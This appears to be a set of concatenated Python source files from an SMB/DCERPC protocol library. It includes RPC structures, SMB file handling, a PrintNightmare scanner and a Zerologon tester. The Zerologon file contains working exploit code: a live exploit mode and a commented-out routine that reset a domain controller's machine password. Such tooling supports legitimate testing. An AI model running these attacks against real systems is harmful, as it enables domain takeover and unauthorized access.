			self['ctx_id'] = 0

class MSRPCBind(Structure):
	_CTX_ITEM_LEN = len(CtxItem())
	structure = ( 
		('max_tfrag','<H=4280'),
		('max_rfrag','<H=4280'),
		('assoc_group','<L=0'),
		('ctx_num','B=0'),
		('Reserved','B=0'),
		('Reserved2','<H=0'),
		('_ctx_items', '_-ctx_items', 'self["ctx_num"]*self._CTX_ITEM_LEN'),
		('ctx_items',':'),
	)
 
	def __init__(self, data = None, alignment = 0):
		Structure.__init__(self, data, alignment)
		if data is None:
			self['max_tfrag'] = 4280
			self['max_rfrag'] = 4280
			self['assoc_group'] = 0
			self['ctx_num'] = 1
			self['ctx_items'] = b''
		self.__ctx_items = []

	def addCtxItem(self, item):
		self.__ctx_items.append(item)
	
	def getData(self):
		self['ctx_num'] = len(self.__ctx_items)
		for i in self.__ctx_items:
			self['ctx_items'] += i.getData()
		return Structure.getData(self)

class MSRPCBindAck(MSRPCHeader):
	_SIZE = 26 # Up to SecondaryAddr
	_CTX_ITEM_LEN = len(CtxItemResult())
	structure = ( 
		('max_tfrag','<H=0'),
		('max_rfrag','<H=0'),
		('assoc_group','<L=0'),
		('SecondaryAddrLen','<H&SecondaryAddr'), 
		('SecondaryAddr','z'),						  # Optional if SecondaryAddrLen == 0
		('PadLen','_-Pad','(4-((self["SecondaryAddrLen"]+self._SIZE) % 4))%4'),
		('Pad',':'),
		('ctx_num','B=0'),
		('Reserved','B=0'),
		('Reserved2','<H=0'),
		('_ctx_items','_-ctx_items','self["ctx_num"]*self._CTX_ITEM_LEN'),
		('ctx_items',':'),
		('_sec_trailer', '_-sec_trailer', '8 if self["auth_len"] > 0 else 0'),
		('sec_trailer',':'),
		('auth_dataLen','_-auth_data','self["auth_len"]'),
		('auth_data',':'),
	)
	def __init__(self, data = None, alignment = 0):
		self.__ctx_items = []
		MSRPCHeader.__init__(self,data,alignment)
		if data is None:
			self['Pad'] = b''
			self['ctx_items'] = b''
			self['sec_trailer'] = b''
			self['auth_data'] = b''

	def getCtxItems(self):
		return self.__ctx_items

	def getCtxItem(self,index):
		return self.__ctx_items[index-1]

	def fromString(self, data):
		Structure.fromString(self,data)
		# Parse the ctx_items
		data = self['ctx_items']
		for i in range(self['ctx_num']):
			item = CtxItemResult(data)
			self.__ctx_items.append(item)
			data = data[len(item):]
			
class MSRPCBindNak(Structure):
	structure = ( 
		('RejectedReason','<H=0'),
		('SupportedVersions',':'),
	)
	def __init__(self, data = None, alignment = 0):
		Structure.__init__(self,data,alignment)
		if data is None:
			self['SupportedVersions'] = b''

class DCERPC:
	# Standard NDR Representation
	NDRSyntax   = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
	# NDR 64
	NDR64Syntax = uuidtup_to_bin(('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
	transfer_syntax =  NDRSyntax


class DCERPC_RawCall(MSRPCRequestHeader):
	def __init__(self, op_num, data = b'', uuid=None):
		MSRPCRequestHeader.__init__(self)
		self['op_num'] = op_num
		self['pduData'] = data
		if uuid is not None:
			self['flags'] |= PFC_OBJECT_UUID
			self['uuid'] = uuid

	def setData(self, data):
		self['pduData'] = data

# 2.2.6 Type Serialization Version 1
class CommonHeader(NDRSTRUCT):
	structure = (
		('Version', UCHAR),
		('Endianness', UCHAR),
		('CommonHeaderLength', USHORT),
		('Filler', ULONG),
	)
	def __init__(self, data = None,isNDR64 = False):
		NDRSTRUCT.__init__(self, data, isNDR64)
		if data is None:
			self['Version'] = 1
			self['Endianness'] = 0x10
			self['CommonHeaderLength'] = 8
			self['Filler'] = 0xcccccccc

class PrivateHeader(NDRSTRUCT):
	structure = (
		('ObjectBufferLength', ULONG),
		('Filler', ULONG),
	)
	def __init__(self, data = None,isNDR64 = False):
		NDRSTRUCT.__init__(self, data, isNDR64)
		if data is None:
			self['Filler'] = 0xcccccccc

class TypeSerialization1(NDRSTRUCT):
	commonHdr = (
		('CommonHeader', CommonHeader),
		('PrivateHeader', PrivateHeader),
	)
	def getData(self, soFar = 0):
		self['PrivateHeader']['ObjectBufferLength'] = len(NDRSTRUCT.getData(self, soFar)) + len(
			NDRSTRUCT.getDataReferents(self, soFar)) - len(self['CommonHeader']) - len(self['PrivateHeader'])
		return NDRSTRUCT.getData(self, soFar)




from asysocks.unicomm.common.scanner.common import *
from aiosmb.commons.connection.factory import SMBConnectionFactory
from aiosmb.commons.interfaces.machine import SMBMachine
import os
import asyncio

class SMBPrintnightmareRes:
	def __init__(self, vulntype, is_vuln):
		self.vulntype = vulntype
		self.is_vuln = is_vuln

	def get_header(self):
		return ['VULNTYPE','IS_VULNERABLE']

	def to_line(self, separator = '\t'):
		return separator.join([str(self.vulntype), str(self.is_vuln)])

class SMBPrintnightmareScanner:
	def __init__(self, factory:SMBConnectionFactory):
		self.factory:SMBConnectionFactory = factory

	async def run(self, targetid, target, out_queue):
		try:
			connection = self.factory.create_connection_newtarget(target)
			async with connection:
				_, err = await connection.login()
				if err is not None:
					raise err
				
				nonexistentpath = "C:\\doesntexist\\%s.dll" % os.urandom(4).hex()
				async with SMBMachine(connection) as machine:
					_, err = await asyncio.wait_for(machine.printnightmare(nonexistentpath, None, silent=True), 10)
					if err is not None:
						res = SMBPrintnightmareRes('DIRECT', False)
						if str(err).find('ERROR_PATH_NOT_FOUND') != -1:
							res = SMBPrintnightmareRes('DIRECT', True)
							
						await out_queue.put(ScannerData(target, res))

					_, err = await asyncio.wait_for(machine.par_printnightmare(nonexistentpath, None, silent=True), 10)
					if err is not None:
						res = SMBPrintnightmareRes('PAR', False)
						if str(err).find('ERROR_PATH_NOT_FOUND') != -1:
							res = SMBPrintnightmareRes('PAR', True)
						await out_queue.put(ScannerData(target, res))

		except Exception as e:
			await out_queue.put(ScannerError(target, e))




import asyncio
from aiosmb.commons.connection.factory import SMBConnectionFactory
from aiosmb.commons.interfaces.machine import SMBMachine
from aiosmb.dcerpc.v5.interfaces.endpointmgr import EPM
from aiosmb.dcerpc.v5 import nrpc
from struct import pack, unpack
from aiosmb import logger

MAX_ATTEMPTS = 255

#async def pwreset(url_str):
#	password = bytes.fromhex('7c427e53b318ac85c0f35b28dc13a505e11e56cd1eca85f29193fb856e2bf0c92a4c4804a96f6483de18346c72a7bf281394b928232ffd4a7112a9e893ec8da28b9a97e06fe72ef3a0ebb032c0e87b3c697cf8f0a44c226bd711442e825cef593b607cdaf8b72c5934c58e5287bcd2e2246e741e3cacf02e80781089ecf129a2245666a2b55ccee7801a9f007ba7f2760783127c1a33ab9c0e2e228d7bf0e84e6250c377ac2c2432a6ed3793f472a5dbe09d2c93697e271512afccf18f38d482feaf23a3f1c3bf87eb0dd90985c2c7b73d624d7b8d46e048ece053eaee28a2ee43f66be18b0ae4ba8311169b6c399a00')
#	exploit = True
#	dc_name = 'WIN2019AD'
#	dc_handle = '\\\\' + dc_name
#	dc_ip = '10.10.10.2'
#	target_computer = 'WIN2019AD' #without $
#
#	plaintext = b'\x00' * 8
#	ciphertext = b'\x00' * 8
#
#	# Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
#	flags = 0x212fffff
#
#	url = SMBConnectionFactory.from_url(url_str)
#	connection = url.get_connection()
#
#
#	epm = EPM(connection, protocol = 'ncacn_ip_tcp')
#	_, err = await epm.connect()
#	if err is not None:
#		raise err
#	stringBinding, err = await epm.map(nrpc.MSRPC_UUID_NRPC)
#	_, err = await epm.connect()
#	if err is not None:
#		raise err
#
#	dce = epm.get_connection_from_stringbinding(stringBinding)
#	#dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
#
#	_, err = await dce.connect()
#	if err is not None:
#		raise err
#	_, err = await dce.bind(nrpc.MSRPC_UUID_NRPC)
#	if err is not None:
#		raise err
#
#	resp, err = await nrpc.hNetrServerReqChallenge(dce, dc_handle + '\x00', target_computer + '\x00', plaintext)
#	if err is not None:
#		raise err
#	
#	serverChallenge = resp['ServerChallenge']
#	# Empty at this point
#	sessionKey = nrpc.ComputeSessionKeyAES(b'', b'12345678', serverChallenge)
#	ciphertext = nrpc.ComputeNetlogonCredentialAES(b'12345678', sessionKey)
#
#	_, err = await nrpc.hNetrServerAuthenticate3(
#		dce, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
#		target_computer + '\x00', ciphertext, flags
#	)
#	if err is not None:
#		if str(err).find('STATUS_DOWNGRADE_DETECTED') < 0:
#			raise err
#
#	clientStoredCredential = pack('<Q', unpack('<Q',ciphertext)[0] + 10)
#
#	indata = b'\x00' * (512-len(password)) + password + pack('<L', len(password))
#
#	_, err = await nrpc.hNetrServerPasswordSet2(
#		dce, '\\\\' + target_computer + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
#		target_computer + '\x00', update_authenticator(clientStoredCredential, sessionKey), nrpc.ComputeNetlogonCredentialAES(indata, sessionKey)
#	)
#	if err is not None:
#		raise err
#
#	print('Change password OK')

def update_authenticator(clientStoredCredential, sessionKey, plus=10):
	authenticator = nrpc.NETLOGON_AUTHENTICATOR()
	authenticator['Credential'] = nrpc.ComputeNetlogonCredentialAES(clientStoredCredential, sessionKey)
	authenticator['Timestamp'] = plus
	return authenticator


async def run(dc_name, dc_ip, exploit = False):
	#exploit = True
	#dc_name = 'WIN2019AD'
	dc_handle = '\\\\' + dc_name
	#dc_ip = '10.10.10.2'
	target_computer = dc_name #without $

	plaintext = b'\x00' * 8
	ciphertext = b'\x00' * 8

	# Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
	flags = 0x212fffff

	url = SMBConnectionFactory.from_url('smb2+ntlm-password://XXX\\aaa:aaa@%s' % dc_name) # dummy url to speed up the process..
	connection = url.get_connection()

	async with connection:
		epm = EPM(connection, protocol = 'ncacn_ip_tcp')
		_, err = await epm.connect()
		if err is not None:
			raise err
		stringBinding, err = await epm.map(nrpc.MSRPC_UUID_NRPC)
		_, err = await epm.connect()
		if err is not None:
			raise err

		dce = epm.get_connection_from_stringbinding(stringBinding)
		#dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)

		_, err = await dce.connect()
		if err is not None:
			raise err
		_, err = await dce.bind(nrpc.MSRPC_UUID_NRPC)
		if err is not None:
			raise err

		for _ in range(0, MAX_ATTEMPTS):
			print('=====================================================')
			_, err = await nrpc.hNetrServerReqChallenge(dce, dc_handle + '\x00', target_computer + '\x00', plaintext)
			if err is not None:
				raise err
			
			if exploit is False:
				server_auth, err = await nrpc.hNetrServerAuthenticate3(
					dce, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
					target_computer + '\x00', ciphertext, flags
				)
			else:
				authenticator = nrpc.NETLOGON_AUTHENTICATOR()
				authenticator['Credential'] = b'\x00' * 8
				authenticator['Timestamp'] = 0
				server_auth, err = await nrpc.hNetrServerPasswordSet2(
					dce, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, 
					target_computer + '\x00', authenticator, b'\x00' * 516
				)


			if err is not None:
				if err.get_error_code() == 0xc0000022:
					continue
				else:
					raise err
			
			if server_auth['ErrorCode'] == 0:
				print('Server is vulnerable!')
				break
		
		else:
			print('FAILED!')

		await dce.disconnect()

def main():
	import argparse
	import platform
	import logging
	from asysocks import logger as sockslogger

	
	parser = argparse.ArgumentParser(description='Zerologon tester')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	parser.add_argument('-e', '--exploit', action='store_true', help='perform the expolit')
	parser.add_argument('dc_ip', help = 'IP address of the domain controller')
	parser.add_argument('dc_name', help = 'NETBIOS NAME of the domain controller (without $)')
	
	
	args = parser.parse_args()
	if args.verbose >=1:
		logger.setLevel(logging.DEBUG)

	if args.verbose > 2:
		print('setting deepdebug')
		logger.setLevel(1) #enabling deep debug
		sockslogger.setLevel(1)
		asyncio.get_event_loop().set_debug(True)
		logging.basicConfig(level=logging.DEBUG)

	asyncio.run(run(args.dc_name, args.dc_ip, args.exploit))

if __name__ == '__main__':
	main()


from pathlib import PureWindowsPath, PurePath, Path
from aiosmb.wintypes.access_mask import FileAccessMask
from aiosmb.protocol.smb2.commands import *
from aiosmb.wintypes.fscc.structures.fileinfoclass import FileInfoClass
from aiosmb.protocol.smb2.commands.query_info import SecurityInfo
from aiosmb.wintypes.fscc.FileAttributes import FileAttributes

import io
import datetime
import asyncio
from contextlib import asynccontextmanager
from aiosmb.connection import SMBConnection

class SMBFile:
	def __init__(self):
		self.tree_id = None
		self.parent_dir = None
		self.fullpath:str = None
		self.unc_path:str = None
		self.share_path:str = None
		self.name:str = None
		self.size:int = None
		self.creation_time:datetime.datetime = None
		self.last_access_time:datetime.datetime = None
		self.last_write_time:datetime.datetime = None
		self.change_time:datetime.datetime = None
		self.allocation_size:datetime.datetime = None
		self.attributes:FileAttributes = None
		self.file_id:int = None
		self.security_descriptor = None

		#internal
		self.__connection = None
		self.__position = 0
		self.is_pipe = False
		self.maxreadsize = None
		self.mode = ''
	
	async def __aenter__(self):
		return self
	
	async def __aexit__(self, exc_type, exc_val, exc_tb):
		await self.close()

	@staticmethod
	def prepare_mirror_path(basedir:str, unc_path:str, path_with_file = True):
		unc_path = unc_path.lstrip('\\')
		unc = PureWindowsPath('\\\\\\\\' + unc_path)
		host = unc.parts[1].replace('.'	, '_')
		share = unc.parts[2]
		if share.find('$') != -1:
			share = share[:-1] + '_'
		if path_with_file is True:
			dirs = [host, share] + list(unc.parts[3:-1])
		else:
			dirs = [host, share] + list(unc.parts[3:])
		path_to_create = Path(basedir).joinpath(*dirs).resolve()
		return path_to_create
	
	@staticmethod
	def from_uncpath(unc_path:str):
		"""
		Creates SMBFile object from the UNC path supplied.
		Example uncpath: \\\\127.0.0.1\\C$\\temp\\test.exe
		"""
		unc = PureWindowsPath(unc_path)
		f = SMBFile()
		f.share_path = unc.drive
		f.name = unc.name
		f.fullpath = '\\'.join(unc.parts[1:])
		
		return f

	@staticmethod
	def from_remotepath(connection:SMBConnection, remotepath:str):
		"""
		Creates SMBFile object from the connection and the remote path supplied.
		Example remotepath: \\C$\\temp\\test.exe
		"""
		temp = '\\\\%s\\%s'
		if remotepath[0] == '\\':
			temp = '\\\\%s%s'
		unc = temp % (connection.target.get_hostname_or_ip(), remotepath)
		return SMBFile.from_uncpath(unc)
	
	@staticmethod
	def from_smbtarget(target:str):
		"""
		Creates SMBFile object from the SMBUrl object
		"""
		if target.path is None:
			return None
		
		fpath = target.path.replace('/','\\')
		temp = '\\\\%s%s'
		unc = temp % (target.get_hostname_or_ip(), fpath)
		return SMBFile.from_uncpath(unc)

	@staticmethod
	def from_pipename(connection:SMBConnection, pipename:str):
		return SMBFile.from_uncpath('\\\\%s\\IPC$\\%s' % (connection.target.get_hostname_or_ip(), pipename))

	@staticmethod
	async def delete_unc(connection:SMBConnection, remotepath:str):
		try:
			remfile = SMBFile.from_uncpath(remotepath)
			tree_entry, err = await connection.tree_connect(remfile.share_path)
			if err is not None:
				raise err
			tree_id = tree_entry.tree_id

			desired_access = FileAccessMask.DELETE | FileAccessMask.FILE_READ_ATTRIBUTES
			share_mode = ShareAccess.FILE_SHARE_DELETE
			create_options = CreateOptions.FILE_NON_DIRECTORY_FILE | CreateOptions.FILE_DELETE_ON_CLOSE 
			create_disposition = CreateDisposition.FILE_OPEN
			file_attrs = 0

			file_id, err = await connection.create(tree_id, remfile.fullpath, desired_access, share_mode, create_options, create_disposition, file_attrs, return_reply = False)
			if err is not None:
				raise err
			if file_id is not None:
				await connection.close(tree_id, file_id)

			await connection.tree_disconnect(tree_id)
			return True, None
		
		except Exception as e:
			return False, e

	@staticmethod
	async def delete_rempath(connection:SMBConnection, remotepath:str):
		try:
			remfile = SMBFile.from_remotepath(connection, remotepath)
			tree_entry, err = await connection.tree_connect(remfile.share_path)
			if err is not None:
				raise err
			tree_id = tree_entry.tree_id

			desired_access = FileAccessMask.DELETE | FileAccessMask.FILE_READ_ATTRIBUTES
			share_mode = ShareAccess.FILE_SHARE_DELETE
			create_options = CreateOptions.FILE_NON_DIRECTORY_FILE | CreateOptions.FILE_DELETE_ON_CLOSE 
			create_disposition = CreateDisposition.FILE_OPEN
			file_attrs = 0

			file_id, err = await connection.create(tree_id, remfile.fullpath, desired_access, share_mode, create_options, create_disposition, file_attrs, return_reply = False)
			if err is not None:
				raise err
			if file_id is not None:
				await connection.close(tree_id, file_id)

			await connection.tree_disconnect(tree_id)
			return True, None
		
		except Exception as e:
			return False, e

	async def delete(self):
		"""Deletes the file. If the file is open, a flush will be performed followed by a close then a delete."""
		try:
			await self.close()
			#remfile = SMBFile.from_remotepath(connection, remotepath)
			tree_entry, err = await self.__connection.tree_connect(self.share_path)
			if err is not None:
				raise err
			tree_id = tree_entry.tree_id

			desired_access = FileAccessMask.DELETE | FileAccessMask.FILE_READ_ATTRIBUTES
			share_mode = ShareAccess.FILE_SHARE_DELETE
			create_options = CreateOptions.FILE_NON_DIRECTORY_FILE | CreateOptions.FILE_DELETE_ON_CLOSE 
			create_disposition = CreateDisposition.FILE_OPEN
			file_attrs = 0

			file_id, err = await self.__connection.create(
				tree_id, 
				self.fullpath, 
				desired_access, 
				share_mode, 
				create_options, 
				create_disposition, 
				file_attrs, 
				return_reply = False
			)

			if err is not None:
				raise err
			if file_id is not None:
				await self.__connection.close(tree_id, file_id)

			await self.__connection.tree_disconnect(tree_id)
			return True, None
		
		except Exception as e:
			return False, e

	async def get_security_descriptor(self, connection:SMBConnection):
		"""Fetches the security descriptor of the file."""
		if self.security_descriptor is None:
			file_id = None
			try:
				tree_id = self.tree_id
				if self.tree_id is None:
					tree_entry, err = await connection.tree_connect(self.share_path)
					if err is not None:
						raise err
					tree_id = tree_entry.tree_id

				desired_access = FileAccessMask.READ_CONTROL
				share_mode = ShareAccess.FILE_SHARE_READ
				create_options = CreateOptions.FILE_NON_DIRECTORY_FILE | CreateOptions.FILE_SYNCHRONOUS_IO_NONALERT 
				file_attrs = 0
				create_disposition = CreateDisposition.FILE_OPEN
				file_id, err = await connection.create(tree_id, self.fullpath, desired_access, share_mode, create_options, create_disposition, file_attrs)
				if err is not None:
					raise err

				self.security_descriptor, err = await connection.query_info(
					tree_id,
					file_id,
					info_type = QueryInfoType.SECURITY, 
					information_class = FileInfoClass.NONE, 
					additional_information = SecurityInfo.ATTRIBUTE_SECURITY_INFORMATION | SecurityInfo.DACL_SECURITY_INFORMATION | SecurityInfo.OWNER_SECURITY_INFORMATION | SecurityInfo.GROUP_SECURITY_INFORMATION, 
					flags = 0, 
				)
				if err is not None:
					raise err
			except Exception as e:
				return None, e

			finally:
				if file_id is not None:
					await connection.close(tree_id, file_id)
				if tree_id is not None and self.tree_id is None:
					await connection.tree_disconnect(tree_id)

		return self.security_descriptor, None

	async def __read(self, size:int, offset:int):
		"""
		This is the main function for reading.
		It does not do buffering, so if more data is returned it will just discard it
		If less data is returned than requested it will do more reads until the requested size is reached.
		Do not call this directly as it could go in an infinite loop 
		"""
		if self.is_pipe == True:
			data, remaining, err = await self.__connection.read(self.tree_id, self.file_id, offset = offset, length = size)
			return data, err
			
		buffer = b''
		if size > self.__connection.MaxReadSize:
			i = size // self.__connection.MaxReadSize
			for _ in range(i+1):
				data, remaining, err = await self.__connection.read(self.tree_id, self.file_id, offset = offset, length = self.__connection.MaxReadSize)
				offset += len(data)
				buffer += data
				
			return buffer[:size], err
		else:
			data, remaining, err = await self.__connection.read(self.tree_id, self.file_id, offset = offset, length = self.__connection.MaxReadSize)
			if err is not None:
				return None, err
			buffer += data
				
			return buffer[:size], err

	async def __write(self, data:bytes, position_in_file:int = 0):
		"""
		Data must be bytes
		"""
		try:
			remaining = len(data)
			total_bytes_written = 0
			offset = 0
				
			while remaining != 0:
				bytes_written, err = await self.__connection.write(self.tree_id, self.file_id, data[offset:len(data)], offset = position_in_file + offset)
				if err is not None:
					raise err
				total_bytes_written += bytes_written
				remaining -= bytes_written
				offset += bytes_written
				
			return total_bytes_written, None
		except Exception as e:
			return None, e

	async def open(self, connection:SMBConnection, mode:str = 'r'):
		try:
			self.__connection = connection
			self.maxreadsize = connection.MaxReadSize
			self.mode = mode
			if 'p' in self.mode:
				self.is_pipe = True
				self.size = 0
			
			if not self.tree_id:
				tree_entry, err = await connection.tree_connect(self.share_path)
				if err is not None:
					raise err
				self.tree_id = tree_entry.tree_id
			

			#then connect to file
			if 'r' in mode and 'w' in mode:
				raise ValueError('must have exactly one of read/write mode')
				
			if 'r' in mode:
				desired_access = FileAccessMask.FILE_READ_DATA | FileAccessMask.FILE_READ_ATTRIBUTES
				share_mode = ShareAccess.FILE_SHARE_READ
				create_options = CreateOptions.FILE_NON_DIRECTORY_FILE | CreateOptions.FILE_SYNCHRONOUS_IO_NONALERT 
				file_attrs = 0
				create_disposition = CreateDisposition.FILE_OPEN
				
				self.file_id, smb_reply, err = await connection.create(self.tree_id, self.fullpath, desired_access, share_mode, create_options, create_disposition, file_attrs, return_reply = True)
				if err is not None:
					raise err
				self.size = smb_reply.EndofFile
				
			elif 'w' in mode:
				desired_access = FileAccessMask.GENERIC_READ | FileAccessMask.GENERIC_WRITE
				share_mode = ShareAccess.FILE_SHARE_READ | ShareAccess.FILE_SHARE_WRITE
				create_options = CreateOptions.FILE_NON_DIRECTORY_FILE | CreateOptions.FILE_SYNCHRONOUS_IO_NONALERT 
				file_attrs = 0
				create_disposition = CreateDisposition.FILE_OPEN_IF #FILE_OPEN ? might cause an issue?
				
				self.file_id, smb_reply, err = await connection.create(self.tree_id, self.fullpath, desired_access, share_mode, create_options, create_disposition, file_attrs, return_reply = True)
				if err is not None:
					raise err
				self.size = smb_reply.EndofFile
				
			else:
				raise Exception('ONLY read and write is supported at the moment!')
			
			return True, None
		except Exception as e:
			return False, e

	async def download(self, connection:SMBConnection ,local_path:str):
		"""Downloads the file to the local path. File must not be open."""
		try:
			if self.is_pipe:
				raise Exception('Cannot download a pipe!')
			if self.__connection is not None:
				raise Exception('Cannot download a file that is already open!')
			
			_, err = await self.open(connection, 'r')
			if err is not None:
				raise err
			
			lfpath = Path(local_path).joinpath(self.name)
			with open(lfpath, 'wb') as f:
				async for data, err in self.read_chunked():
					if err is not None:
						raise err
					if not data:
						break
					f.write(data)
			
			return lfpath, None
		except Exception as e:
			return False, e
		finally:
			await self.close()
		
	async def open_pipe(self, connection:SMBConnection, mode:str):
		try:
			self.__connection = connection
			self.is_pipe = True
			self.size = 0
			share_mode = 0
			file_attrs = 0x80
			create_options = 0
			create_disposition = CreateDisposition.FILE_OPEN
			desired_access = 0
			if 'r' in mode:
				desired_access |= FileAccessMask.FILE_READ_DATA
			if 'w' in mode:
				desired_access |= FileAccessMask.FILE_WRITE_DATA

			tree_entry, err = await self.__connection.tree_connect(self.share_path)
			if err is not None:
				raise err
			self.tree_id = tree_entry.tree_id
			self.file_id, smb_reply, err = await self.__connection.create(self.tree_id, self.fullpath, desired_access, share_mode, create_options, create_disposition, file_attrs, return_reply = True)
			if err is not None:
				raise err

			return True, None
		except Exception as e:
			return False, e
		
		
	async def seek(self, offset:int, whence:int = 0):
		"""Sets the current position of the file buffer to the given offset."""
		try:
			if whence == 0:
				if offset < 0:
					raise Exception('Offset must be > 0 when whence is 0')
				if offset > self.size:
					raise Exception('Seeking outside of file size!')
				self.__position = offset
			
			elif whence == 1:
				if 0 < self.__position + offset < self.size:
					self.__position += offset
				else:
					raise Exception('Seeking outside of file size!')
			
			elif whence == 2:
				if 0 < self.size + offset < self.size:
					self.__position = self.size + offset
				else:
					raise Exception('Seeking outside of file size!')
			
			return True, None
		except Exception as e:
			return None, e
		
	async def read(self, size:int = -1):
		try:
			if self.is_pipe is True:
				data, err = await self.__read(size, 0)
				return data, err
			
			if size > self.size:
				size = -1
				#raise Exception('Requested read size %s is larger than the file size %s' % (hex(size), hex(self.size)))

			if size == 0:
				return b'', None
				#raise Exception('Cant read 0 bytes')
				
			elif size == -1:
				if self.__position == self.size:
					return b'', None
				data, err = await self.__read(self.size - self.__position, self.__position)
				if err is not None:
					raise err
				self.__position += len(data)
				
				return data, err
				
			elif size > 0:
				if self.__position == self.size:
					return b'', None
				if size + self.__position > self.size:
					size = self.size - self.__position
				data, err = await self.__read(size, self.__position)
				if err is not None:
					raise err
				self.__position += len(data)
				return data, err

		except Exception as e:
			return None, e

	async def read_chunked(self, size:int = -1, chunksize:int = -1):
		"""
		Much like read, but yields chuks of chunksize untill the full size is read
		Use this when reading large files as a whole, as this method doesn't caches 
		the whole data read in memory, only chunskize
		chunksize -1 will use the maximum chunk allowed by the underlying connection layer, it is advised to not set manually!
		"""
		if self.is_pipe is True:
			raise Exception('Cant stream pipes!')

		if chunksize == -1:
			chunksize = self.__connection.MaxReadSize

		if size == 0:
			yield None, None
			
		elif size == -1:
			while True:
				req_size = chunksize
				if self.size - self.__position < chunksize:
					req_size = self.size - self.__position
					if req_size == 0:
						#consumed all data
						yield None, None
						raise StopIteration

				data, err = await self.__read(req_size, self.__position)
				if err is None:
					self.__position += len(data)
				yield data, err
			
		elif size > 0:
			if self.__position == self.size:
				yield None, None
				raise StopIteration
			if size + self.__position > self.size:
				size = self.size - self.__position

			while True:
				req_size = chunksize
				if size - self.__position < chunksize:
					req_size = size - self.__position
				if req_size == 0:
					yield None, None
					raise StopIteration
				data, err = await self.__read(req_size, self.__position)
				if err is None:
					self.__position += len(data)
				yield data, err
			
	async def write(self, data:bytes):
		"""Writes the given bytes to the file from the current position."""
		try:
			if len(data) < self.__connection.MaxWriteSize:
				count, err = await self.__write(data, self.__position)
				if err is not None:
					raise err
				if self.is_pipe == False:
					self.__position += count
				return count, None

			total_writen = 0

			while total_writen != len(data) :
				count, err = await self.__write(data[total_writen:total_writen+self.__connection.MaxWriteSize], self.__position)
				if err is not None:
					raise err
				total_writen += count
				if self.is_pipe == False:
					self.__position += count		

			return total_writen, None
		
		except Exception as e:
			return None, e

	async def write_buffer(self, buffer:io.BytesIO):
		"""Writes the contents of the buffer(or file handle) to the file. Doesnt work with pipes!"""
		try:
			if self.is_pipe == True:
				raise Exception('Doesnt work with pipes!')
			
			total_writen = 0
			while True:
				await asyncio.sleep(0) #to make sure we are not consuming all CPU
				chunk = buffer.read(self.__connection.MaxWriteSize)
				if len(chunk) == 0:
					return total_writen, None
				bytes_written, err = await self.__write(chunk, self.__position)
				if err is not None:
					raise err

				self.__position += bytes_written
				total_writen += bytes_written
			return total_writen, None
		except Exception as e:
			return None, e
		
	async def flush(self):
		"""Issues a flush command on the SMB protocol"""
		if 'w' not in self.mode:
			return
		await self.__connection.flush(self.tree_id, self.file_id)			
		
	async def close(self):
		"""Closes the file including the fileId"""
		if self.file_id is None:
			return
		if self.tree_id is None:
			return
		
		try:
			await self.flush()
		except:
			pass
		await self.__connection.close(self.tree_id, self.file_id)
	
	def tell(self) -> int:
		"""Returns current position in file"""
		return self.__position
		
	def __str__(self):
		t = '===== FILE =====\r\n'
		for k in self.__dict__:
			if k.startswith('parent_'):
				continue
			t += '%s : %s\r\n' % (k, self.__dict__[k])
		
		return t

@asynccontextmanager
async def smb_open(path:str, mode = 'r', connection = None) -> SMBFile:
	"""
	Opens a file on the remote server
	path can be a smb:// url or a path like \\server\share\path\to\file
	"""
	try:
		if path.lower().startswith('smb'):
			from aiosmb.commons.connection.factory import SMBConnectionFactory
			factory = SMBConnectionFactory.from_url(path)
			if connection is None:
				connection = factory.get_connection()
				async with connection:
					_, err = await connection.login()
					if err is not None:
						raise err
					file = factory.get_file()
					_, err = await file.open(connection, mode)
					if err is not None:
						raise err
					yield file
					return
			else:
				file = factory.get_file()
				_, err = await file.open(connection, mode)
				if err is not None:
					raise err
				yield file
				return
		else:
			file = SMBFile.from_remotepath(connection, path)
			_, err = await file.open(connection, mode)
			if err is not None:
				raise err
			yield file
			return
	finally:
		if file is not None:
			await file.close()


async def amain():
	url = 'smb2+ntlm-password://TEST\\Administrator:Passw0rd!1@10.10.10.2/C$/temp/repodata.json'
	async with smb_open(url, 'rb') as f:
		data, err = await f.read(1024)
		print(data)
		print(len(data))
	
	from aiosmb.commons.connection.factory import SMBConnectionFactory
	connection = SMBConnectionFactory.from_url(url).get_connection()
	_, err = await connection.login()
	if err is not None:
		raise err
		
	async with smb_open('C$/temp/repodata.json', 'rb', connection=connection) as f:
		while True:
			data, err = await f.read(1024)
			print(data)
			print(len(data))
			if data == b'':
				break

	async with smb_open('C$/temp/repodata1.json', 'wb', connection=connection) as f:
		_, err = await f.write(b'HELLO')
		if err is not None:
			print(err)
	
	async with smb_open('C$/temp/repodata1.json', 'rb', connection=connection) as f:
		data, err = await f.read(1024)
		if err is not None:
			print(err)
			return
		print(data)
		print(len(data))
	
	print('DONE!')

if __name__ == '__main__':
	import asyncio
	asyncio.run(amain())




import copy
from typing import List

from aiosmb.dcerpc.v5.common.connection.connectionstring import DCERPCStringBinding
from asysocks.unicomm.common.proxy import UniProxyTarget
from asysocks.unicomm.common.target import UniTarget, UniProto


class DCERPCTarget(UniTarget):
	def __init__(self, connection_string:str, ip, port, protocol, rpcprotocol, proxies = None, timeout = 1, hostname = None, domain = None, dc_ip = None, smb_connection = None, pipe=None):
		self.connection_string = connection_string
		self.rpcprotocol = rpcprotocol
		self.pipe = pipe
		self.smb_connection = smb_connection #storing the smb connection if already exists...
		UniTarget.__init__(self, ip, port, protocol, timeout, hostname = hostname, proxies = proxies, domain = domain, dc_ip = dc_ip)
		

	def get_hostname_or_ip(self):
		if self.smb_connection is not None:
			return self.smb_connection.target.get_hostname_or_ip()
		if self.hostname is None:
			return self.ip
		return self.hostname
	
	def get_ip_or_hostname(self):
